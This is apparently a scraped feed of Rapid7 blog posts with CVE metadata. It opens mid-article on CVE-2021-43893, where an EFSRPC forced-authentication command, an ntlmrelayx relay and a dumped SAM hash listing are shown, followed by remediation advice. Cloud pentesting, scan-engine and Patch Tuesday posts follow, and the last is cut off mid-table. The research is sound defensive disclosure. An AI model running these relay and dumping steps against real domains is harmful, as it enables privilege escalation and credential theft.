brought multiple changes to `efslsaext.dll` and resulted in partial mitigation of [CVE-2021-43893](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43893>). One of the changes was the introduction of two new functions: `EfsEnsureLocalPath` and `EfsEnsureLocalHandle`. `EfsEnsureLocalPath` grabs a HANDLE for the attacker provided file using [CreateW](<https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilew>). The HANDLE is then passed to `EfsEnsureLocalHandle`, which passes the HANDLE to `NtQueryVolumeInformationFile` to validate the characteristics flag doesn\u2019t contain [FILE_REMOTE_DEVICE](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/616b66d5-b335-4e1c-8f87-b4a55e8d3e4a>).\n\n![Dropping Files on a Domain Controller Using CVE-2021-43893](https://blog.rapid7.com/content/images/2022/02/image7.png)\n\nBecause the patch **still** opens a HANDLE using the attacker-controlled file path, EFSRPC _remains_ vulnerable to forced authentication and relay attacks of the machine account.\n\nDemonstration of the forced authentication and relay does not require the complicated attack often associated with PetitPotam. We just need three boxes:\n\nThe Relay (10.0.0.3): A Linux system running `ntlmrelayx.py`. \nThe Attacker (10.0.0.6): A fully patched Windows 10 system. \nThe Victim (10.0.0.12): A fully patched Windows Server 2019 system.\n\nThe only caveat for this example is that the victim\u2019s machine account (aka [computer account](<https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/service-accounts-computer>)) is assigned to the `Domain Admins` group. Below, you can see the machine account for 10.0.0.12, YEET$, is a member of `Domain Admins`.\n\n![Dropping Files on a Domain Controller Using CVE-2021-43893](https://blog.rapid7.com/content/images/2022/02/image9.png)\n\nThis may not be a common configuration, but it\u2019s common enough that it\u2019s been the subject of a [couple](<https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/pass-the-hash-with-machine-accounts>) [excellent](<https://pentestlab.blog/2022/02/01/machine-accounts/>) writeups.\n\nThe attack is launched by a low-privileged user on 10.0.0.6 using the `blankspace.exe` proof of concept. The attack will force 10.0.0.12 (yet.okhuman.ninja) to authenticate to the attacker relay at 10.0.0.3\n \n \n C:\\ProgramData>blankspace.exe -r yeet.okhuman.ninja -f \\\\10.0.0.3\\r7\\r7 --relay\n ____ ___ __ ____\n /\\ _`\\ /\\_ \\ /\\ \\ /\\ _`\\\n \\ \\ \\L\\ \\//\\ \\ __ ___\\ \\ \\/'\\ \\ \\,\\L\\_\\ _____ __ ___ __\n \\ \\ _ <'\\ \\ \\ /'__`\\ /' _ `\\ \\ , < \\/_\\__ \\ /\\ '__`\\ /'__`\\ /'___\\ /'__`\\\n \\ \\ \\L\\ \\\\_\\ \\_/\\ \\L\\.\\_/\\ \\/\\ \\ \\ \\\\`\\ /\\ \\L\\ \\ \\ \\L\\ \\/\\ \\L\\.\\_/\\ \\__//\\ __/\n \\ \\____//\\____\\ \\__/.\\_\\ \\_\\ \\_\\ \\_\\ \\_\\ \\ `\\____\\ \\ ,__/\\ \\__/.\\_\\ \\____\\ \\____\\\n \\/___/ \\/____/\\/__/\\/_/\\/_/\\/_/\\/_/\\/_/ \\/_____/\\ \\ \\/ \\/__/\\/_/\\/____/\\/____/\n \\ \\_\\\n \\/_/\n [+] Creating EFS RPC binding handle to yeet.okhuman.ninja\n [+] Sending EfsRpcDecryptFileSrv for \\\\10.0.0.3\\r7\\r7\n [-] EfsRpcDecryptFileSrv failed with status code: 53\n [+] Network path not found error received!\n [!] Success!\n \n C:\\ProgramData>\n \n\nThe Linux relay is running [ntlmrelayx.py](<https://blog.fox-it.com/2017/05/09/relaying-credentials-everywhere-with-ntlmrelayx/>) and configured to relay the YEET$ authentication to 10.0.0.6 (the original attacker box). Below, you can see `ntlmrelayx.py` capture the authentication and send it on to 10.0.0.6.\n \n \n albinolobster@ubuntu:~/impacket/examples$ sudo python3 ntlmrelayx.py -debug -t 10.0.0.6 -smb2support \n Impacket v0.9.25.dev1+20220105.151306.10e53952 - Copyright 2021 SecureAuth Corporation\n \n [*] SMBD-Thread-4: Connection from OKHUMAN/YEET$@10.0.0.12 controlled, attacking target smb://10.0.0.6\n [*] Authenticating against smb://10.0.0.6 as OKHUMAN/YEET$ SUCCEED\n \n\nThe relay is now authenticated to 10.0.0.6 as `YEET$`, a domain administrator. It can do pretty much as it pleases. Below, you can see it dumps the local SAM database.\n \n \n [*] Target system bootKey: 0x9f868ddb4e1dfc56d992aa76ff931df4\n [+] Saving remote SAM database\n [*] Dumping local SAM hashes (uid:rid:lmhash:nthash)\n [+] Calculating HashedBootKey from SAM\n [+] NewStyle hashes is: True\n Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\n [+] NewStyle hashes is: True\n Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\n [+] NewStyle hashes is: True\n DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\n [+] NewStyle hashes is: True\n WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6aa01bb4a68e7fd8650cdeb6ad2b63ec:::\n [+] NewStyle hashes is: True\n albinolobster:1000:aad3b435b51404eeaad3b435b51404ee:430ef7587d6ac4410ac8b78dd5cc2bbe:::\n [*] Done dumping SAM hashes for host: 10.0.0.6\n \n\nIt\u2019s as easy as that. All you have to do is find a host with a machine account in the domain admins group:\n \n \n C:\\ProgramData>net group \"domain admins\" /domain\n The request will be processed at a domain controller for domain okhuman.ninja.\n \n Group name Domain Admins\n Comment Designated administrators of the domain\n \n Members\n \n -------------------------------------------------------------------------------\n Administrator test_domain_admin YEET$\n The command completed successfully.\n \n \n C:\\ProgramData>\n \n\nOnce you have that, a low-privileged remote attacker can use EFSRPC to relay and escalate to other machines. However, the attack isn\u2019t exactly silent. On 10.0.0.6, event ID 4624 was created when the 10.0.0.3 relay logged in using the YEET$ machine account.\n\n![Dropping Files on a Domain Controller Using CVE-2021-43893](https://blog.rapid7.com/content/images/2022/02/image3-1.png)\n\n## Final thoughts and remediation\n\nWhat began as an investigation into using an unpatched remote file-write vulnerability ended up being a history lesson in EFSRPC patches. The remote file-write vulnerability that I originally wanted to use has been patched, but we demonstrated the forced authentication issue hasn\u2019t been adequately fixed. There is no doubt that Windows developers have a tough job. However, a lot of the issues discussed here could have been easily avoided with a reasonable patch in August 2021. The fact that they persist today says a lot about the current state of Windows security.\n\nTo mitigate these issues as best as possible, as always, ensure your systems are successfully updated monthly. Microsoft has released multiple advisories with recommendations regarding NTLM Relay-based attacks (see: [Microsoft Security Advisory 974926 \n](<https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2009/974926>) and [KB5005413: Mitigating NTLM Relay Attacks on Active Directory Certificate Services (AD CS)](<https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429>). The most important advice is to ensure SMBv1 no longer exists in your environment and to require SMB signing.\n\nSome other general advice:\n\n * Monitoring for [event ID 4420](<https://support.microsoft.com/en-au/topic/kb5009763-efs-security-hardening-changes-in-cve-2021-43217-719fbc9d-ad9b-4f90-a964-0afe40338002>) in Windows application event logs can help detect EFSRPC-based hacking tools.\n * Monitor for [event ID 4624](<https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624>) in Windows security event logs for remote machine account authentication.\n * Audit machine accounts to ensure they are not members of Domain Admins. \nIf possible, audit %PATH% of critical systems to ensure no world-writable path exists.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2021-43893 with [authenticated vulnerability checks](<https://www.rapid7.com/db/vulnerabilities/msft-cve-2021-43893/>) available in the December 15, 2021 content release.\n\nMetasploit Framework users can test their exposure to forced authentication attacks with a new [PetitPotam](<https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/dcerpc/petitpotam.rb>) module available in the 6.1.29 release.\n\n_**Additional reading:**_\n\n * _[PetitPotam: Novel Attack Chain Can Fully Compromise Windows Domains Running AD CS](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>)_\n * _[Driver-Based Attacks: Past and Present](<https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/>)_\n * _[Open-Source Security: Getting to the Root of the Problem](<https://www.rapid7.com/blog/post/2022/01/19/open-source-security-getting-to-the-root-of-the-problem/>)_\n * _[Ongoing Exploitation of Windows Installer CVE-2021-41379](<https://www.rapid7.com/blog/post/2021/11/30/ongoing-exploitation-of-windows-installer-cve-2021-41379/>)_\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-14T15:30:52", "type": "rapid7blog", "title": "Dropping Files on a Domain Controller Using CVE-2021-43893", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379", "CVE-2021-43217", "CVE-2021-43893", "CVE-2021-44228"], "modified": "2022-02-14T15:30:52", "id": "RAPID7BLOG:F14E17E573386DB3DDD27A8E829E49A1", "href": "https://blog.rapid7.com/2022/02/14/dropping-files-on-a-domain-controller-using-cve-2021-43893/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-21T15:28:51", "description": "![Cloud Pentesting, Pt. 1: Breaking Down the Basics](https://blog.rapid7.com/content/images/2022/03/cloud-pentesting-1.jpg)\n\nThe concept of cloud computing has been around for awhile, but it seems like as of late \u2014 at least in the [penetration testing](<https://www.rapid7.com/fundamentals/penetration-testing/>) field \u2014 more and more customers are looking to get a pentest done in their cloud deployment. What does that mean? How does that look? What can be tested, and what\u2019s out of scope? Why would I want a pentest in the cloud? Let\u2019s start with the basics here, to hopefully shed some light on what this is all about, and then we\u2019ll get into the thick of it.\n\nCloud computing is the idea of using software and services that run on the internet as a way for an organization to deploy their once on-premise systems. This isn't a new concept \u2014 in fact, the major vendors, such as [Amazon\u2019s AWS](<https://www.rapid7.com/fundamentals/aws-cloud-security/>), Microsoft\u2019s Azure, and Google\u2019s Cloud Platform, have all been around for about 15 years. Still, cloud sometimes seems like it\u2019s being talked about as if it was invented just yesterday, but we\u2019ll get into that a bit more later.\n\nSo, cloud computing means using someone else\u2019s computer, in a figurative or quite literal sense. Simple enough, right? \n\nWrong! There are various ways that companies have started to utilize cloud providers, and these all impact how pentests are carried out in cloud environments. Let\u2019s take a closer look at the three primary cloud configurations.\n\n## Traditional cloud usage\n\nSome companies have simply lifted infrastructure and services straight from their own on-premise data centers and moved them into the cloud. This looks a whole lot like setting up one virtual private cloud (VPC), with numerous virtual machines, a flat network, and that\u2019s it! While this might not seem like a company is using their cloud vendor to its fullest potential, they\u2019re still reaping the benefits of never having to manage uptime of physical hardware, calling their ISP late at night because of an outage, or worrying about power outages or cooling. \n\nBut one inherent problem remains: The company still requires significant staff to maintain the virtual machines and perform operating system updates, software versioning, cipher suite usage, code base fixes, and more. This starts to look a lot like the typical [vulnerability management (VM) program](<https://www.rapid7.com/fundamentals/vulnerability-management-program-framework/>), where IT and security continue to own and maintain infrastructure. They work to patch and harden endpoints in the cloud and are still in line for changes to be committed to the cloud infrastructure.\n\n## Cloud-native usage\n\nThe other side of cloud adoption is a more mature approach, where a company has devoted time and effort toward transitioning their once on-premise infrastructure to a fully utilized cloud deployment. While this could very well include the use of the typical VPC, network stack, virtual machines, and more, the more mature organization will utilize cloud-native deployments. These could include storage services such as S3, function services, or even cloud-native [Kubernetes](<https://www.rapid7.com/blog/post/2022/01/27/why-security-in-kubernetes-isnt-the-same-as-in-linux-part-1/>). \n\nCloud-native users shift the priorities and responsibilities of IT and security teams so that they no longer act as gatekeepers to prevent the scaling up or out of infrastructure utilized by product teams. In most of these environments, the product teams own the ability to make commitments in the cloud without IT and security input. Meanwhile, IT and security focus on proper controls and configurations to prevent security incidents. Patching is exchanged for rebuilds, and network alerting and physical server isolation are handled through automated responses, such as an alert with AWS Config that automatically changes the security group for a resource in the cloud and isolates it for further investigation. \n\nThese types of deployments start to more fully utilize the capabilities of the cloud, such as automated deployment through infrastructure-as-code solutions like AWS Cloud Formation. Gone are the days when an organization would deploy Kubernetes on top of a virtual machine to deploy containers. Now, cloud-native vendors provide this service with AWS\u2019s Elastic Kubernetes Services, Microsoft\u2019s Azure Kubernetes Services, and for obvious reasons, Google\u2019s Kubernetes Engine. These and other types of cloud native deployments really help to ease the burden on the organization.\n\n## Hybrid cloud\n\nThen there\u2019s hybrid cloud. This is where a customer can set up their on-premise environment to also tie into their cloud environment, or visa versa. One common theme we see is with Microsoft Azure, where the Azure AD Connect sync is used to synchronize on-premise Active Directory to Azure AD. This can be very beneficial when the company is using other Software-as-a-Service (SaaS) components, such as Microsoft Office 365. \n\nThere are various benefits to utilizing hybrid cloud deployments. Maybe there are specific components that a customer wants to keep in house and support on their own infrastructure. Or perhaps the customer doesn\u2019t yet have experience with how to maintain Kubernetes but is utilizing Google Cloud Platform. The ability to deploy your own services is the key to flexibility, and the cloud helps provide that.\n\nIn part two, we\u2019ll take a closer look at how these different cloud deployments impact pentesting in the cloud.\n\n**_Additional reading:_**\n\n * _[Why Security in Kubernetes Isn't the Same as in Linux: Part 1](<https://www.rapid7.com/blog/post/2022/01/27/why-security-in-kubernetes-isnt-the-same-as-in-linux-part-1/>)_\n * [_Dropping Files on a Domain Controller Using CVE-2021-43893_](<https://www.rapid7.com/blog/post/2022/02/14/dropping-files-on-a-domain-controller-using-cve-2021-43893/>)\n * _[Time to Act: Bridging the Gap in Cloud Automation Adoption](<https://www.rapid7.com/blog/post/2021/11/11/time-to-act-bridging-the-gap-in-cloud-automation-adoption/>)_\n * [_Hands-On IoT Hacking: Rapid7 at DefCon IoT Village, Part 1_](<https://www.rapid7.com/blog/post/2021/10/21/hands-on-iot-hacking-rapid7-at-defcon-iot-village-pt-1/>)\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-21T14:32:42", "type": "rapid7blog", "title": "Cloud Pentesting, Pt. 1: Breaking Down the Basics", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43893"], "modified": "2022-03-21T14:32:42", "id": "RAPID7BLOG:5E98567442ADCB32BB59B8024706BABB", "href": "https://blog.rapid7.com/2022/03/21/cloud-pentesting-pt-1-breaking-down-the-basics/", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-03-07T17:28:26", "description": "![InsightVM Scan Engine: Understanding MAC Address Discovery](https://blog.rapid7.com/content/images/2022/03/insightvm-mac-address.jpg)\n\n_Written in collaboration with Jimmy Cancilla_\n\nWhen scanning an asset, one key piece of data that the [InsightVM](<https://www.rapid7.com/products/insightvm/>) Scan Engine collects is the MAC address of the network interface used during the connection. The MAC address is one of several attributes used by the Security Console to perform asset correlation. As a result of the volatile nature of IP addresses, identifying assets using the MAC address can provide increased reliability when integrating scan results. In some cases, the MAC address can be used as a rudimentary means of fingerprinting an asset. Several manufacturers will use the same first 3 bytes when assigning a MAC address to a device (for example, several CISCO SYSTEMS, INC devices use 00000C as the MAC address prefix). \n\nWhen performing an authenticated scan (a scan whereby the engine has the necessary credentials to authenticate to the target), collecting the MAC address is relatively straightforward, as all operating systems provide tooling to gather this information. However, collecting the MAC address with an unauthenticated scan (a scan where no credentials are provided) is less reliable. This is due to limitations of network protocols and modern network topologies. \n\n## Breaking down IP protocols\n\nIn order to understand these limitations, it is important to first understand the fundamentals of the [IP protocol suite](<https://en.wikipedia.org/wiki/Internet_protocol_suite>). \n\nThe IP protocol suite can be thought of in 4 layers:\n\n![InsightVM Scan Engine: Understanding MAC Address Discovery](https://blog.rapid7.com/content/images/2022/03/image1-3.png)\n\nThe MAC address is part of the bottom layer called the Link Layer. The MAC address is used by the hardware when communicating with other devices on the **same network equipment**. Any devices communicating at the Link layer do so without the use of routers.\n\nOn the other hand, IP addresses are part of the Network layer. IP addresses are used to communicate with devices across different networks, traversing through routers.\n\n## MAC address discovery with unauthenticated scans\n\nThis leads to the limitation in unauthenticated scans. When performing an unauthenticated scan against assets that are accessed via a router, the scan engine is only able to communicate with that asset via the Network layer. The implications of this are that the MAC address is not included in the network packets received by the scan engine. This is not a limitation or defect of the scan engine, but rather a reality of the IP protocol suite and modern network infrastructure.\n\nTo work around these limitations in the IP protocol suite, the InsightVM scan engine uses several alternative methods to attempt to collect the MAC address of assets being scanned. In general, these alternative methods attempt to authenticate to an asset over various protocols using known default credentials. As a result of this capability in the scan engine, asset results from unauthenticated scans may include the MAC address despite being scanned over a router. However, it is important to note that the success rate is dependent on whether assets are configured to allow authentication using default credentials.\n\n_****Note**: **SNMPv1 and SNMPv2 are more likely than most protocols to be configured with known default credentials._\n\n## Summary\n\nThe following tables outline the different methods that the scan engine will use to collect MAC addresses from targets, and whether or not authentication is required.\n\n### Windows\n\nMethod | Authenticated or unauthenticated scan \n---|--- \nvia SMB protocol | Authenticated \nvia WMI protocol | Authenticated \nScan Assistant | Authenticated \nSNMPv1 or SNMPv2 | Authenticated or unauthenticated \n \n**Note:** Collecting the MAC address via SNMPv1 or SNMPv2 with an unauthenticated scan is only possible if the scan engine can authenticate using the default credentials for these protocols. However, it is _not_ recommended that default credentials be left enabled as this poses a serious security risk. \n \n### Linux\n\nMethod | Authenticated or unauthenticated scan \n---|--- \nVia SSH protocol | Authenticated \nVia an insecure Telnet protocol | Authenticated \n \n**Note:** Running an insecure Telnet server on an asset is a serious security risk and is _not_ recommended. \nSNMPv1 or SNMPv2 | Authenticated or unauthenticated \n \n**Note:** Collecting the MAC address via SNMPv1 or SNMPv2 with an unauthenticated scan is only possible if the scan engine can authenticate using the default credentials for these protocols. However, it is _not_ recommended that default credentials be left enabled as this poses a serious security risk. \n \nOver the years, the engineering team here at Rapid7 has partnered with dozens of security teams to identify pain points and develop solutions. The importance of collecting the MAC address for targets being scanned is well understood. As a result, the InsightVM Scan Engine has been designed to utilize a multi-pronged approach to collecting MAC addresses from assets. \n\n**_Additional reading: _**\n\n * _[What's New in InsightVM and Nexpose: Q4 2021 in Review](<https://www.rapid7.com/blog/post/2022/02/18/whats-new-in-insightvm-and-nexpose-q4-2021-in-review/>)_\n * _[Log4Shell 2 Months Later: Security Strategies for the Internet's New Normal](<https://www.rapid7.com/blog/post/2022/02/17/log4shell-2-months-later-security-strategies-for-the-internets-new-normal/>)_\n * _[Dropping Files on a Domain Controller Using CVE-2021-43893](<https://www.rapid7.com/blog/post/2022/02/14/dropping-files-on-a-domain-controller-using-cve-2021-43893/>)_\n * _[Distribute Reports to Email Addresses in InsightVM](<https://www.rapid7.com/blog/post/2021/11/17/distribute-reports-to-email-addresses-in-insightvm/>)_\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-07T16:53:44", "type": "rapid7blog", "title": "InsightVM Scan Engine: Understanding MAC Address Discovery", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43893"], "modified": "2022-03-07T16:53:44", "id": "RAPID7BLOG:0305BCDA9DE47FE4223986163B0EA7C4", "href": "https://blog.rapid7.com/2022/03/07/insightvm-scan-engine-understanding-mac-address-discovery-2/", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-12-22T09:04:02", "description": "![Patch Tuesday - December 2021](https://blog.rapid7.com/content/images/2021/12/patches-2.jpg)\n\nThis month\u2019s Patch Tuesday comes in the middle of a global effort to mitigate [Apache Log4j CVE-2021-44228](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>). In today\u2019s security release, Microsoft issued fixes for 83 vulnerabilities across an array of products \u2014 including a fix for Windows Defender for IoT, which is [vulnerable to CVE-2021-44228](<https://techcommunity.microsoft.com/t5/microsoft-defender-for-iot/updated-13-dec-microsoft-defender-for-iot-security-advisory/m-p/3036844>) amongst seven other remote code execution (RCE) vulnerabilities (the cloud service is not affected). Six CVEs in the bulletin have been publicly disclosed; the only vulnerability noted as being exploited in the wild in this month\u2019s release is [CVE-2021-43890](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43890>), a Windows AppX Installer spoofing bug that may aid in social engineering attacks and has evidently been used in Emotet malware campaigns.\n\nInterestingly, this round of fixes also includes [CVE-2021-43883](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43883>), a Windows Installer privilege escalation bug whose advisory is sparse despite the fact that it appears to affect all supported versions of Windows. While there\u2019s no indication in the advisory that the two vulnerabilities are related, CVE-2021-43883 looks an awful lot like the fix for [a zero-day vulnerability](<https://www.rapid7.com/blog/post/2021/11/30/ongoing-exploitation-of-windows-installer-cve-2021-41379/>) that made a splash in the security community last month after proof-of-concept exploit code was released and in-the-wild attacks began. The zero-day vulnerability, which researchers hypothesized was a patch bypass for CVE-2021-41379, allowed low-privileged attackers to overwrite protected files and escalate to SYSTEM. Rapid7\u2019s vulnerability research team did a full [root cause analysis](<https://attackerkb.com/topics/7LstI2clmF/cve-2021-41379/rapid7-analysis?referrer=ptblog>) of the bug as attacks ramped up in November.\n\nAs usual, RCE flaws figure prominently in the \u201cCritical\u201d-rated CVEs this month. In addition to Windows Defender for IoT, critical RCE bugs were fixed this month in Microsoft Office, Microsoft Devices, Internet Storage Name Service (iSNS), and the WSL extension for Visual Studio Code. Given the outsized risk presented by most vulnerable implementations of Log4Shell, administrators should prioritize patches for any products affected by CVE-2021-44228. Past that, put critical server-side and OS RCE patches at the top of your list, and we\u2019d advise sneaking in the fix for CVE-2021-43883 despite its lower severity rating. \n\n## Summary charts\n\n![Patch Tuesday - December 2021](https://lh6.googleusercontent.com/iJ4PWxiyEYCgbzRaFbEmnJE783RDrZfby6l9Ld3WCgftcqvRiqMRIMme22umWxTL6-7R33efcphYrbBXU0JKiU8HkN8f7aWB-olpubLyE0kiL8iDqZzx-2jmClFDBG-V6HGPAb5Y)![Patch Tuesday - December 2021](https://blog.rapid7.com/content/images/2021/12/image-3.png)![Patch Tuesday - December 2021](https://blog.rapid7.com/content/images/2021/12/image-4.png)![Patch Tuesday - December 2021](https://blog.rapid7.com/content/images/2021/12/image-5.png)\n\n## Summary tables\n\n### Apps Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed? | CVSSv3 | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-43890](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43890>) | Windows AppX Installer Spoofing Vulnerability | Yes | Yes | 7.1 | Yes \n[CVE-2021-43905](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43905>) | Microsoft Office app Remote Code Execution Vulnerability | No | No | 9.6 | Yes \n \n### Browser Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed? | CVSSv3 | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-4068](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4068>) | Chromium: CVE-2021-4068 Insufficient validation of untrusted input in new tab page | No | No | N/A | Yes \n[CVE-2021-4067](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4067>) | Chromium: CVE-2021-4067 Use after free in window manager | No | No | N/A | Yes \n[CVE-2021-4066](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4066>) | Chromium: CVE-2021-4066 Integer underflow in ANGLE | No | No | N/A | Yes \n[CVE-2021-4065](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4065>) | Chromium: CVE-2021-4065 Use after free in autofill | No | No | N/A | Yes \n[CVE-2021-4064](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4064>) | Chromium: CVE-2021-4064 Use after free in screen capture | No | No | N/A | Yes \n[CVE-2021-4063](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4063>) | Chromium: CVE-2021-4063 Use after free in developer tools | No | No | N/A | Yes \n[CVE-2021-4062](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4062>) | Chromium: CVE-2021-4062 Heap buffer overflow in BFCache | No | No | N/A | Yes \n[CVE-2021-4061](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4061>) | Chromium: CVE-2021-4061 Type Confusion in V8 | No | No | N/A | Yes \n[CVE-2021-4059](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4059>) | Chromium: CVE-2021-4059 Insufficient data validation in loader | No | No | N/A | Yes \n[CVE-2021-4058](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4058>) | Chromium: CVE-2021-4058 Heap buffer overflow in ANGLE | No | No | N/A | Yes \n[CVE-2021-4057](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4057>) | Chromium: CVE-2021-4057 Use after free in file API | No | No | N/A | Yes \n[CVE-2021-4056](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4056>) | Chromium: CVE-2021-4056: Type Confusion in loader | No | No | N/A | Yes \n[CVE-2021-4055](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4055>) | Chromium: CVE-2021-4055 Heap buffer overflow in extensions | No | No | N/A | Yes \n[CVE-2021-4054](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4054>) | Chromium: CVE-2021-4054 Incorrect security UI in autofill | No | No | N/A | Yes \n[CVE-2021-4053](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4053>) | Chromium: CVE-2021-4053 Use after free in UI | No | No | N/A | Yes \n[CVE-2021-4052](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4052>) | Chromium: CVE-2021-4052 Use after free in web apps | No | No | N/A | Yes \n \n### Developer Tools Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed? | CVSSv3 | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-43907](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43907>) | Visual Studio Code WSL Extension Remote Code Execution Vulnerability | No | No | 9.8 | No \n[CVE-2021-43908](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43908>) | Visual Studio Code Spoofing Vulnerability | No | No | nan | No \n[CVE-2021-43891](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43891>) | Visual Studio Code Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-43896](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43896>) | 